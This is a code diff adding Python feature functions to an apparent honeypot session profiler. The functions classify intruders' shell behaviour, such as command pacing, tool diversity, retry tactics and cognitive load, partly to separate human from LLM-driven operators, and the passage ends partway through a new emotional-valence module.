|
||||||
|
from behave_core.spec.envelope import Observation, Window
|
||||||
|
|
||||||
|
from decnet.profiler.behave_shell._ctx import SessionContext
|
||||||
|
|
||||||
|
|
||||||
|
def make_observation(
|
||||||
|
ctx: SessionContext,
|
||||||
|
*,
|
||||||
|
primitive: str,
|
||||||
|
value: Any,
|
||||||
|
confidence: float,
|
||||||
|
) -> Observation:
|
||||||
|
"""Build one :class:`Observation` for the whole-session window."""
|
||||||
|
return Observation(
|
||||||
|
primitive=primitive,
|
||||||
|
value=value,
|
||||||
|
confidence=confidence,
|
||||||
|
window=Window(start_ts=ctx.t_start, end_ts=ctx.t_end),
|
||||||
|
source=ctx.source,
|
||||||
|
evidence_ref=ctx.evidence_ref,
|
||||||
|
)
|
||||||
593
decnet/profiler/behave_shell/_features/cognitive.py
Normal file
593
decnet/profiler/behave_shell/_features/cognitive.py
Normal file
@@ -0,0 +1,593 @@
|
|||||||
|
"""``cognitive.*`` feature functions.
|
||||||
|
|
||||||
|
Step 5: ``cognitive.inter_command_latency_class``.
|
||||||
|
Step 6: ``cognitive.command_branch_diversity``.
|
||||||
|
Step 7: ``cognitive.feedback_loop_engagement``.
|
||||||
|
Step 8: ``cognitive.inter_command_consistency``.
|
||||||
|
Step D.1: ``cognitive.cognitive_load``.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import statistics
|
||||||
|
from typing import Iterator
|
||||||
|
|
||||||
|
from behave_core.spec.envelope import Observation
|
||||||
|
|
||||||
|
from decnet.profiler.behave_shell._ctx import SessionContext
|
||||||
|
from decnet.profiler.behave_shell._features._emit import make_observation
|
||||||
|
from decnet.profiler.behave_shell._parse import hash_token
|
||||||
|
from decnet.profiler.behave_shell._thresholds import (
|
||||||
|
BRANCH_DIVERSITY_LINEAR_MIN,
|
||||||
|
COGNITIVE_LOAD_CHUNKING_REF_CV,
|
||||||
|
COGNITIVE_LOAD_LOW_MAX,
|
||||||
|
COGNITIVE_LOAD_MEDIUM_MAX,
|
||||||
|
COGNITIVE_LOAD_PACE_REF_CV,
|
||||||
|
EXPLORATION_CHAOTIC_BACKTRACK_MIN,
|
||||||
|
EXPLORATION_TARGETED_REP_MIN,
|
||||||
|
FEEDBACK_CORRELATION_MIN,
|
||||||
|
FEEDBACK_MIN_PAIRS,
|
||||||
|
FRUSTRATION_LOW_MAX,
|
||||||
|
FRUSTRATION_MODERATE_MAX,
|
||||||
|
IKI_THINK_MAX_S,
|
||||||
|
INTER_CMD_DELIBERATE_MAX,
|
||||||
|
INTER_CMD_INSTANT_MAX,
|
||||||
|
INTER_CMD_LLM_HEAVYWEIGHT_MAX,
|
||||||
|
INTER_CMD_LLM_LIGHTWEIGHT_MAX,
|
||||||
|
INTER_CMD_TYPING_MAX,
|
||||||
|
MIN_COMMANDS_FOR_FULL_CONFIDENCE,
|
||||||
|
PAUSE_CV_BIMODAL_MIN,
|
||||||
|
PAUSE_CV_METRONOMIC_MAX,
|
||||||
|
PLANNING_DEEP_MIN,
|
||||||
|
PLANNING_REACTIVE_MIN,
|
||||||
|
TOOL_VOCAB_BROAD_MIN,
|
||||||
|
TOOL_VOCAB_NARROW_MAX,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
# Precomputed at import time so the per-session hot loop is a set
|
||||||
|
# membership check, not 3 sha256 ops per command. The ``--help`` /
|
||||||
|
# ``-h`` flag forms can't be detected here — they're not first tokens
|
||||||
|
# (PII discipline keeps only the *first* token's hash). v0.2 will
|
||||||
|
# reconsider once corpus calibration justifies storing arg-token
|
||||||
|
# hashes too.
|
||||||
|
_HELP_FAMILY_HASHES: frozenset[str] = frozenset({
|
||||||
|
hash_token("man"),
|
||||||
|
hash_token("help"),
|
||||||
|
hash_token("info"),
|
||||||
|
})
|
||||||
|
|
||||||
|
|
||||||
|
def _clip01(x: float) -> float:
|
||||||
|
if x < 0.0:
|
||||||
|
return 0.0
|
||||||
|
if x > 1.0:
|
||||||
|
return 1.0
|
||||||
|
return x
|
||||||
|
|
||||||
|
|
||||||
|
def _cv(xs: tuple[float, ...] | list[float]) -> float | None:
|
||||||
|
"""Coefficient of variation; ``None`` if undefined (n<2 or mean==0)."""
|
||||||
|
if len(xs) < 2:
|
||||||
|
return None
|
||||||
|
mean = statistics.fmean(xs)
|
||||||
|
if mean <= 0.0:
|
||||||
|
return None
|
||||||
|
return statistics.stdev(xs) / mean
|
||||||
|
|
||||||
|
|
||||||
|
def _bucket_inter_cmd_latency(median_iat: float) -> str:
|
||||||
|
if median_iat <= INTER_CMD_INSTANT_MAX:
|
||||||
|
return "instant"
|
||||||
|
if median_iat <= INTER_CMD_TYPING_MAX:
|
||||||
|
return "typing_speed"
|
||||||
|
if median_iat <= INTER_CMD_DELIBERATE_MAX:
|
||||||
|
return "deliberate"
|
||||||
|
if median_iat <= INTER_CMD_LLM_LIGHTWEIGHT_MAX:
|
||||||
|
return "llm_lightweight"
|
||||||
|
if median_iat <= INTER_CMD_LLM_HEAVYWEIGHT_MAX:
|
||||||
|
return "llm_heavyweight"
|
||||||
|
return "long"
|
||||||
|
|
||||||
|
|
||||||
|
def inter_command_latency_class(ctx: SessionContext) -> Iterator[Observation]:
|
||||||
|
"""Emit ``cognitive.inter_command_latency_class``.
|
||||||
|
|
||||||
|
Operator's *thinking pace* between commands, bucketed against
|
||||||
|
calibrated thresholds. Splits LW-sim / CLAUDE-FF / CLAUDE-CL.
|
||||||
|
"""
|
||||||
|
if not ctx.inter_cmd_iats:
|
||||||
|
return
|
||||||
|
median_iat = statistics.median(ctx.inter_cmd_iats)
|
||||||
|
bucket = _bucket_inter_cmd_latency(median_iat)
|
||||||
|
# Sample-size honesty: < 5 commands → halve confidence
|
||||||
|
if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||||
|
confidence = 0.40
|
||||||
|
else:
|
||||||
|
confidence = 0.80
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="cognitive.inter_command_latency_class",
|
||||||
|
value=bucket,
|
||||||
|
confidence=confidence,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def command_branch_diversity(ctx: SessionContext) -> Iterator[Observation]:
|
||||||
|
"""Emit ``cognitive.command_branch_diversity``.
|
||||||
|
|
||||||
|
Content-based discriminator (no timing): unique first-token ratio
|
||||||
|
over total commands. Splits CLAUDE-FF (linear_playbook) from
|
||||||
|
CLAUDE-CL (adaptive_branching). The empirical anchor on
|
||||||
|
2026-05-02: fire-and-forget runs ~10 distinct tools; closed-loop
|
||||||
|
runs 5-6 with ``curl`` re-invoked as the operator chases threads.
|
||||||
|
"""
|
||||||
|
n = len(ctx.commands)
|
||||||
|
if n == 0:
|
||||||
|
# No commands at all → nothing honest to say. Skip emission.
|
||||||
|
return
|
||||||
|
if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||||
|
# Registry admits "unknown"; absence of *enough* data is itself
|
||||||
|
# a high-confidence answer.
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="cognitive.command_branch_diversity",
|
||||||
|
value="unknown",
|
||||||
|
confidence=1.0,
|
||||||
|
)
|
||||||
|
return
|
||||||
|
unique = len({c.first_token_hash for c in ctx.commands})
|
||||||
|
ratio = unique / n
|
||||||
|
if ratio >= BRANCH_DIVERSITY_LINEAR_MIN:
|
||||||
|
value = "linear_playbook"
|
||||||
|
else:
|
||||||
|
# Anything below the linear floor is treated as adaptive — the
|
||||||
|
# operator is reusing tools, the discriminative signal we
|
||||||
|
# actually want.
|
||||||
|
value = "adaptive_branching"
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="cognitive.command_branch_diversity",
|
||||||
|
value=value,
|
||||||
|
confidence=0.80,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def feedback_loop_engagement(ctx: SessionContext) -> Iterator[Observation]:
|
||||||
|
"""Emit ``cognitive.feedback_loop_engagement``.
|
||||||
|
|
||||||
|
Pearson correlation between ``output_per_cmd[i]`` (bytes the
|
||||||
|
operator saw before the next command) and
|
||||||
|
``inter_cmd_iats[i]`` (the pause that followed). closed_loop
|
||||||
|
operators read more before pausing more; fire_and_forget operators
|
||||||
|
pace independently of output. CUTS ACROSS the LLM/human axis —
|
||||||
|
closed-loop LLMs and reading humans both score closed_loop.
|
||||||
|
|
||||||
|
First primitive that depends on output events: zero output events
|
||||||
|
in the shard → emit ``unknown`` at confidence 1.0 (no honest
|
||||||
|
correlation possible) and exit.
|
||||||
|
"""
|
||||||
|
pairs = list(zip(ctx.output_per_cmd, ctx.inter_cmd_iats))
|
||||||
|
if not ctx.output_events or len(pairs) < FEEDBACK_MIN_PAIRS:
|
||||||
|
if not ctx.commands:
|
||||||
|
return
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="cognitive.feedback_loop_engagement",
|
||||||
|
value="unknown",
|
||||||
|
confidence=1.0,
|
||||||
|
)
|
||||||
|
return
|
||||||
|
xs = [float(p[0]) for p in pairs]
|
||||||
|
ys = [float(p[1]) for p in pairs]
|
||||||
|
try:
|
||||||
|
r = statistics.correlation(xs, ys)
|
||||||
|
except statistics.StatisticsError:
|
||||||
|
# Constant series on either axis — correlation undefined.
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="cognitive.feedback_loop_engagement",
|
||||||
|
value="unknown",
|
||||||
|
confidence=1.0,
|
||||||
|
)
|
||||||
|
return
|
||||||
|
if r > FEEDBACK_CORRELATION_MIN:
|
||||||
|
value = "closed_loop"
|
||||||
|
else:
|
||||||
|
value = "fire_and_forget"
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="cognitive.feedback_loop_engagement",
|
||||||
|
value=value,
|
||||||
|
confidence=0.75,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def error_resilience_fallback_to_man(ctx: SessionContext) -> Iterator[Observation]:
|
||||||
|
"""Emit ``cognitive.error_resilience.fallback_to_man``.
|
||||||
|
|
||||||
|
For each errored command, check whether the operator's next
|
||||||
|
command is ``man`` / ``help`` / ``info`` — i.e. they reached for
|
||||||
|
the manual rather than re-trying or pivoting. If at least one
|
||||||
|
errored command triggered this fallback → ``present``; otherwise
|
||||||
|
``absent``.
|
||||||
|
|
||||||
|
Skip emission when no commands errored — the registry's binary
|
||||||
|
has no ``unknown``, and emitting ``absent`` from no observation
|
||||||
|
at all would be dishonest.
|
||||||
|
|
||||||
|
The ``--help`` / ``-h`` flag forms can't fire this primitive in
|
||||||
|
v0.1: they aren't first tokens, and the engine only retains
|
||||||
|
``first_token_hash`` per command (PII discipline). Filed for v0.2.
|
||||||
|
"""
|
||||||
|
errored_indices = [i for i, c in enumerate(ctx.commands) if c.errored]
|
||||||
|
if not errored_indices:
|
||||||
|
return
|
||||||
|
fallback_count = 0
|
||||||
|
for i in errored_indices:
|
||||||
|
if i + 1 >= len(ctx.commands):
|
||||||
|
continue
|
||||||
|
if ctx.commands[i + 1].first_token_hash in _HELP_FAMILY_HASHES:
|
||||||
|
fallback_count += 1
|
||||||
|
value = "present" if fallback_count > 0 else "absent"
|
||||||
|
|
||||||
|
if len(errored_indices) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||||
|
confidence = 0.40
|
||||||
|
else:
|
||||||
|
confidence = 0.65
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="cognitive.error_resilience.fallback_to_man",
|
||||||
|
value=value,
|
||||||
|
confidence=confidence,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def error_resilience_frustration_typing(ctx: SessionContext) -> Iterator[Observation]:
|
||||||
|
"""Emit ``cognitive.error_resilience.frustration_typing``.
|
||||||
|
|
||||||
|
Compares median within-command IAT for commands *following* an
|
||||||
|
errored command against the same statistic for commands following
|
||||||
|
a successful command. A large relative delta indicates the operator
|
||||||
|
typed differently after a failure — speed-up (rage / fluency) or
|
||||||
|
slowdown (caution); both are signs of arousal.
|
||||||
|
|
||||||
|
Skip emission when either group is empty (no errors, or every
|
||||||
|
command errored — no clean baseline). Sample-size honesty drops
|
||||||
|
confidence below the floor.
|
||||||
|
"""
|
||||||
|
post_err: list[float] = []
|
||||||
|
post_ok: list[float] = []
|
||||||
|
cmds = ctx.commands
|
||||||
|
intra = ctx.intra_command_iats
|
||||||
|
if len(cmds) < 2 or len(intra) != len(cmds):
|
||||||
|
return
|
||||||
|
for i in range(1, len(cmds)):
|
||||||
|
cmd_iats = intra[i]
|
||||||
|
if not cmd_iats:
|
||||||
|
continue
|
||||||
|
m = statistics.median(cmd_iats)
|
||||||
|
if cmds[i - 1].errored:
|
||||||
|
post_err.append(m)
|
||||||
|
else:
|
||||||
|
post_ok.append(m)
|
||||||
|
if not post_err or not post_ok:
|
||||||
|
return
|
||||||
|
median_err = statistics.median(post_err)
|
||||||
|
median_ok = statistics.median(post_ok)
|
||||||
|
if median_ok <= 0.0:
|
||||||
|
return
|
||||||
|
delta = abs(median_err - median_ok) / median_ok
|
||||||
|
|
||||||
|
if delta < FRUSTRATION_LOW_MAX:
|
||||||
|
value = "low"
|
||||||
|
elif delta < FRUSTRATION_MODERATE_MAX:
|
||||||
|
value = "moderate"
|
||||||
|
else:
|
||||||
|
value = "high"
|
||||||
|
|
||||||
|
if len(post_err) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||||
|
confidence = 0.40
|
||||||
|
else:
|
||||||
|
confidence = 0.60
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="cognitive.error_resilience.frustration_typing",
|
||||||
|
value=value,
|
||||||
|
confidence=confidence,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def error_resilience_retry_tactic(ctx: SessionContext) -> Iterator[Observation]:
|
||||||
|
"""Emit ``cognitive.error_resilience.retry_tactic``.
|
||||||
|
|
||||||
|
For each command with ``Command.errored=True``, classify the
|
||||||
|
operator's response by the *next* command:
|
||||||
|
|
||||||
|
* **rerun** — same first_token_hash as the errored command. The
|
||||||
|
operator re-invoked the same tool (often after fixing args
|
||||||
|
mid-edit, but we can't see args).
|
||||||
|
* **switch** — different first_token_hash. Pivoted to a different
|
||||||
|
tool.
|
||||||
|
* **abort** — no next command. Session ended after the error.
|
||||||
|
|
||||||
|
The session's reported tactic is the **modal** response across all
|
||||||
|
errored commands (with ties broken in registry order: rerun >
|
||||||
|
modify > switch > abort). Skip emission entirely when no commands
|
||||||
|
errored — the registry has no ``unknown`` here, and silence is the
|
||||||
|
most honest answer.
|
||||||
|
|
||||||
|
The ``modify`` value (edit-and-retry) requires within-command
|
||||||
|
diffing of arg tokens, which crosses the PII boundary the engine
|
||||||
|
holds (only ``first_token_hash`` is retained per command). v0.1
|
||||||
|
therefore never emits ``modify``; v0.2 will once the PII trade-off
|
||||||
|
is revisited against a real attacker corpus.
|
||||||
|
"""
|
||||||
|
errored = [(i, c) for i, c in enumerate(ctx.commands) if c.errored]
|
||||||
|
if not errored:
|
||||||
|
return
|
||||||
|
counts = {"rerun": 0, "switch": 0, "abort": 0}
|
||||||
|
for i, cmd in errored:
|
||||||
|
if i + 1 >= len(ctx.commands):
|
||||||
|
counts["abort"] += 1
|
||||||
|
elif ctx.commands[i + 1].first_token_hash == cmd.first_token_hash:
|
||||||
|
counts["rerun"] += 1
|
||||||
|
else:
|
||||||
|
counts["switch"] += 1
|
||||||
|
# Registry-order tiebreak (rerun > modify > switch > abort).
|
||||||
|
# `modify` deferred — never increments here.
|
||||||
|
order = ("rerun", "switch", "abort")
|
||||||
|
value = max(order, key=lambda k: counts[k])
|
||||||
|
|
||||||
|
if len(errored) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||||
|
confidence = 0.40
|
||||||
|
else:
|
||||||
|
confidence = 0.65
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="cognitive.error_resilience.retry_tactic",
|
||||||
|
value=value,
|
||||||
|
confidence=confidence,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def tool_vocabulary(ctx: SessionContext) -> Iterator[Observation]:
|
||||||
|
"""Emit ``cognitive.tool_vocabulary`` ∈ {narrow, moderate, broad}.
|
||||||
|
|
||||||
|
Absolute count of distinct first_token_hashes. Skip emission when
|
||||||
|
no commands exist; below the sample-size floor we still emit, but
|
||||||
|
at confidence 0.40 — a session with few commands but five distinct
|
||||||
|
tools is genuinely a moderate-vocabulary signal.
|
||||||
|
"""
|
||||||
|
if not ctx.commands:
|
||||||
|
return
|
||||||
|
distinct = len({c.first_token_hash for c in ctx.commands})
|
||||||
|
if distinct <= TOOL_VOCAB_NARROW_MAX:
|
||||||
|
value = "narrow"
|
||||||
|
elif distinct >= TOOL_VOCAB_BROAD_MIN:
|
||||||
|
value = "broad"
|
||||||
|
else:
|
||||||
|
value = "moderate"
|
||||||
|
if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||||
|
confidence = 0.40
|
||||||
|
else:
|
||||||
|
confidence = 0.70
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="cognitive.tool_vocabulary",
|
||||||
|
value=value,
|
||||||
|
confidence=confidence,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def planning_depth(ctx: SessionContext) -> Iterator[Observation]:
|
||||||
|
"""Emit ``cognitive.planning_depth`` ∈ {deep, shallow, reactive}.
|
||||||
|
|
||||||
|
Read off the distribution of inter-command IATs:
|
||||||
|
|
||||||
|
* **deep** — many think-pauses (> ``IKI_THINK_MAX_S``). The
|
||||||
|
operator stops to think between commands.
|
||||||
|
* **reactive** — most pauses are sub-instant
|
||||||
|
(≤ ``INTER_CMD_INSTANT_MAX``). Knee-jerk pacing — automated
|
||||||
|
runner, prepared playbook, or an LLM with no internal latency.
|
||||||
|
* **shallow** — neither: mostly typing-speed pauses, no extended
|
||||||
|
contemplation.
|
||||||
|
|
||||||
|
Skip emission when no inter-command IATs exist (one or zero
|
||||||
|
commands); the registry has no ``unknown`` for this primitive.
|
||||||
|
"""
|
||||||
|
iats = ctx.inter_cmd_iats
|
||||||
|
if not iats:
|
||||||
|
return
|
||||||
|
n = len(iats)
|
||||||
|
deep_count = sum(1 for x in iats if x > IKI_THINK_MAX_S)
|
||||||
|
reactive_count = sum(1 for x in iats if x <= INTER_CMD_INSTANT_MAX)
|
||||||
|
deep_frac = deep_count / n
|
||||||
|
reactive_frac = reactive_count / n
|
||||||
|
|
||||||
|
if deep_frac >= PLANNING_DEEP_MIN:
|
||||||
|
value = "deep"
|
||||||
|
elif reactive_frac >= PLANNING_REACTIVE_MIN:
|
||||||
|
value = "reactive"
|
||||||
|
else:
|
||||||
|
value = "shallow"
|
||||||
|
|
||||||
|
if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||||
|
confidence = 0.40
|
||||||
|
else:
|
||||||
|
confidence = 0.65
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="cognitive.planning_depth",
|
||||||
|
value=value,
|
||||||
|
confidence=confidence,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def exploration_style(ctx: SessionContext) -> Iterator[Observation]:
|
||||||
|
"""Emit ``cognitive.exploration_style`` ∈ {methodical, chaotic, targeted}.
|
||||||
|
|
||||||
|
Two-axis classification over the first_token_hash sequence:
|
||||||
|
|
||||||
|
* **methodical** — low repetition, low backtracks. Operator marches
|
||||||
|
forward through new tools.
|
||||||
|
* **targeted** — high repetition (R ≥ EXPLORATION_TARGETED_REP_MIN).
|
||||||
|
Same tool re-invoked repeatedly; the operator is drilling.
|
||||||
|
* **chaotic** — high backtrack rate (J ≥ EXPLORATION_CHAOTIC_BACKTRACK_MIN).
|
||||||
|
Jumps among previously-used tools without a clear thread.
|
||||||
|
|
||||||
|
The registry doesn't permit ``unknown``; below the
|
||||||
|
MIN_COMMANDS_FOR_FULL_CONFIDENCE floor we emit at confidence 0.40
|
||||||
|
rather than skip — the engine has *some* signal, just less of it.
|
||||||
|
Skip emission only when there are no commands at all.
|
||||||
|
"""
|
||||||
|
n = len(ctx.commands)
|
||||||
|
if n == 0:
|
||||||
|
return
|
||||||
|
hashes = [c.first_token_hash for c in ctx.commands]
|
||||||
|
unique = len(set(hashes))
|
||||||
|
repetition_rate = 0.0 if n == 0 else 1.0 - (unique / n)
|
||||||
|
|
||||||
|
# Backtrack: at position i, hashes[i] previously seen at index < i-1
|
||||||
|
# and not equal to hashes[i-1]. (Repeating the immediate predecessor
|
||||||
|
# is "drilling", picked up by repetition_rate; backtrack is the
|
||||||
|
# non-local jump signal.)
|
||||||
|
seen_before: set[str] = set()
|
||||||
|
backtracks = 0
|
||||||
|
transitions = 0
|
||||||
|
if hashes:
|
||||||
|
seen_before.add(hashes[0])
|
||||||
|
for i in range(1, n):
|
||||||
|
transitions += 1
|
||||||
|
if hashes[i] != hashes[i - 1] and hashes[i] in seen_before:
|
||||||
|
backtracks += 1
|
||||||
|
seen_before.add(hashes[i])
|
||||||
|
backtrack_rate = (backtracks / transitions) if transitions else 0.0
|
||||||
|
|
||||||
|
if backtrack_rate >= EXPLORATION_CHAOTIC_BACKTRACK_MIN:
|
||||||
|
value = "chaotic"
|
||||||
|
elif repetition_rate >= EXPLORATION_TARGETED_REP_MIN:
|
||||||
|
value = "targeted"
|
||||||
|
else:
|
||||||
|
value = "methodical"
|
||||||
|
|
||||||
|
if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||||
|
confidence = 0.40
|
||||||
|
else:
|
||||||
|
confidence = 0.60
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="cognitive.exploration_style",
|
||||||
|
value=value,
|
||||||
|
confidence=confidence,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def cognitive_load(ctx: SessionContext) -> Iterator[Observation]:
|
||||||
|
"""Emit ``cognitive.cognitive_load`` ∈ {low, medium, high}.
|
||||||
|
|
||||||
|
Composite of three [0, 1]-clipped sub-signals, mean-aggregated:
|
||||||
|
|
||||||
|
* **chunking** — median CV of intra-command IATs / reference CV.
|
||||||
|
Fragmented mid-command typing → high contribution.
|
||||||
|
* **errors** — fraction of commands whose post-execution output
|
||||||
|
matched a canonical error fingerprint (``Command.errored`` from
|
||||||
|
Step D.0). Failures pile load.
|
||||||
|
* **pace variability** — CV of inter-command IATs / reference CV.
|
||||||
|
A spread of think-pause durations → unsettled cadence → load.
|
||||||
|
|
||||||
|
Components missing data contribute 0.0 (no penalty for an absent
|
||||||
|
signal), and the composite normalises by *available* component
|
||||||
|
count so a session with zero inter-command pauses isn't punished
|
||||||
|
for the silence. Skip emission entirely when no commands at all
|
||||||
|
exist — there's no honest answer.
|
||||||
|
|
||||||
|
v0.1 thresholds; D.8 re-tunes once the rest of Phase D is stable.
|
||||||
|
"""
|
||||||
|
if not ctx.commands:
|
||||||
|
return
|
||||||
|
|
||||||
|
# Component A: chunking variance — median within-command CV
|
||||||
|
per_cmd_cvs: list[float] = []
|
||||||
|
for cmd_iats in ctx.intra_command_iats:
|
||||||
|
cv = _cv(cmd_iats)
|
||||||
|
if cv is not None:
|
||||||
|
per_cmd_cvs.append(cv)
|
||||||
|
if per_cmd_cvs:
|
||||||
|
chunking_load: float | None = _clip01(
|
||||||
|
statistics.median(per_cmd_cvs) / COGNITIVE_LOAD_CHUNKING_REF_CV
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
chunking_load = None
|
||||||
|
|
||||||
|
# Component B: error rate
|
||||||
|
error_load: float = sum(1 for c in ctx.commands if c.errored) / len(ctx.commands)
|
||||||
|
error_load = _clip01(error_load)
|
||||||
|
|
||||||
|
# Component C: pace variability — CV of inter-command IATs
|
||||||
|
pace_cv = _cv(ctx.inter_cmd_iats)
|
||||||
|
if pace_cv is not None:
|
||||||
|
pace_load: float | None = _clip01(pace_cv / COGNITIVE_LOAD_PACE_REF_CV)
|
||||||
|
else:
|
||||||
|
pace_load = None
|
||||||
|
|
||||||
|
components = [c for c in (chunking_load, error_load, pace_load) if c is not None]
|
||||||
|
if not components:
|
||||||
|
return
|
||||||
|
load = sum(components) / len(components)
|
||||||
|
|
||||||
|
if load < COGNITIVE_LOAD_LOW_MAX:
|
||||||
|
value = "low"
|
||||||
|
elif load < COGNITIVE_LOAD_MEDIUM_MAX:
|
||||||
|
value = "medium"
|
||||||
|
else:
|
||||||
|
value = "high"
|
||||||
|
|
||||||
|
if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
|
||||||
|
confidence = 0.40
|
||||||
|
else:
|
||||||
|
# Composite over three soft sub-signals — held below the
|
||||||
|
# cap of single-source primitives. D.8 re-tunes.
|
||||||
|
confidence = 0.60
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="cognitive.cognitive_load",
|
||||||
|
value=value,
|
||||||
|
confidence=confidence,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def inter_command_consistency(ctx: SessionContext) -> Iterator[Observation]:
|
||||||
|
"""Emit ``cognitive.inter_command_consistency``.
|
||||||
|
|
||||||
|
CV (stdev / mean) of inter-command IATs.
|
||||||
|
|
||||||
|
* ``metronomic`` (CV < 0.40) → LLM-pure. Empirical anchor:
|
||||||
|
LLM-simulated session CV ≈ 0.24 in this corpus.
|
||||||
|
* ``variable`` (0.40 ≤ CV < 1.50) → human. Empirical anchor:
|
||||||
|
human session CV ≈ 0.94.
|
||||||
|
* ``bimodal`` (CV ≥ 1.50) → LLM-assisted human, heuristic. v0.1
|
||||||
|
uses CV-only; true bimodal detection (Hartigan dip / two-peak)
|
||||||
|
is filed for v0.2 per the registry's ``notes:`` field.
|
||||||
|
"""
|
||||||
|
iats = ctx.inter_cmd_iats
|
||||||
|
if len(iats) < 2:
|
||||||
|
return
|
||||||
|
mean = statistics.fmean(iats)
|
||||||
|
if mean <= 0.0:
|
||||||
|
return
|
||||||
|
cv = statistics.stdev(iats) / mean
|
||||||
|
if cv < PAUSE_CV_METRONOMIC_MAX:
|
||||||
|
value = "metronomic"
|
||||||
|
elif cv >= PAUSE_CV_BIMODAL_MIN:
|
||||||
|
value = "bimodal"
|
||||||
|
else:
|
||||||
|
value = "variable"
|
||||||
|
confidence = (
|
||||||
|
0.40 if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE else 0.75
|
||||||
|
)
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="cognitive.inter_command_consistency",
|
||||||
|
value=value,
|
||||||
|
confidence=confidence,
|
||||||
|
)
|
||||||
223
decnet/profiler/behave_shell/_features/emotional_valence.py
Normal file
223
decnet/profiler/behave_shell/_features/emotional_valence.py
Normal file
@@ -0,0 +1,223 @@
|
|||||||
|
"""``emotional_valence.*`` feature functions (Phase G, soft block).
|
||||||
|
|
||||||
|
All four primitives in this module ride a hard 0.5 confidence cap
|
||||||
|
(:data:`EMOTIONAL_VALENCE_CONFIDENCE_CAP`). Cap is enforced inside
|
||||||
|
the feature functions, *not* via :func:`make_observation` — sample-size
|
||||||
|
honesty may still pull confidence below 0.5.
|
||||||
|
|
||||||
|
Step G.5: ``emotional_valence.valence``.
|
||||||
|
Step G.6: ``emotional_valence.arousal`` (lands later).
|
||||||
|
Step G.7: ``emotional_valence.stress_response`` (lands later).
|
||||||
|
Step G.8: ``emotional_valence.frustration_venting`` (lands later).
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import statistics
|
||||||
|
from typing import Iterator
|
||||||
|
|
||||||
|
from behave_core.spec.envelope import Observation
|
||||||
|
|
||||||
|
from decnet.profiler.behave_shell._ctx import SessionContext
|
||||||
|
from decnet.profiler.behave_shell._features._emit import make_observation
|
||||||
|
from decnet.profiler.behave_shell._thresholds import (
|
||||||
|
AROUSAL_BANG_RUN_MIN,
|
||||||
|
AROUSAL_CALM_IAT_S,
|
||||||
|
AROUSAL_CAPS_RUN_MIN,
|
||||||
|
AROUSAL_FAST_IAT_S,
|
||||||
|
AROUSAL_MIN_IATS,
|
||||||
|
EMOTIONAL_VALENCE_CONFIDENCE_CAP,
|
||||||
|
FRUST_VENT_FULL_CONFIDENCE_MIN,
|
||||||
|
FRUST_VENT_MIN_TYPED_CHARS,
|
||||||
|
STRESS_DISTRESS_RATIO_MIN,
|
||||||
|
STRESS_EUSTRESS_RATIO_MIN,
|
||||||
|
STRESS_MIN_ERRORED_WITH_IATS,
|
||||||
|
VALENCE_FULL_CONFIDENCE_MIN,
|
||||||
|
VALENCE_MIN_HITS,
|
||||||
|
VALENCE_MIN_TYPED_CHARS,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _cap_soft(c: float) -> float:
|
||||||
|
"""Clamp confidence to the soft-primitive ceiling."""
|
||||||
|
return min(c, EMOTIONAL_VALENCE_CONFIDENCE_CAP)
|
||||||
|
|
||||||
|
|
||||||
|
def valence(ctx: SessionContext) -> Iterator[Observation]:
|
||||||
|
"""Emit ``emotional_valence.valence`` ∈ {positive, neutral, negative}.
|
||||||
|
|
||||||
|
Pure ratio over the lexical counters built in G.0:
|
||||||
|
|
||||||
|
* ``positive`` — ``positive_lex_hits > negative_lex_hits +
|
||||||
|
obscenity_hits`` AND ``positive_lex_hits ≥ VALENCE_MIN_HITS`` (2).
|
||||||
|
* ``negative`` — ``negative_lex_hits + obscenity_hits >
|
||||||
|
positive_lex_hits`` AND that sum ≥ ``VALENCE_MIN_HITS``.
|
||||||
|
* ``neutral`` — fall-through.
|
||||||
|
|
||||||
|
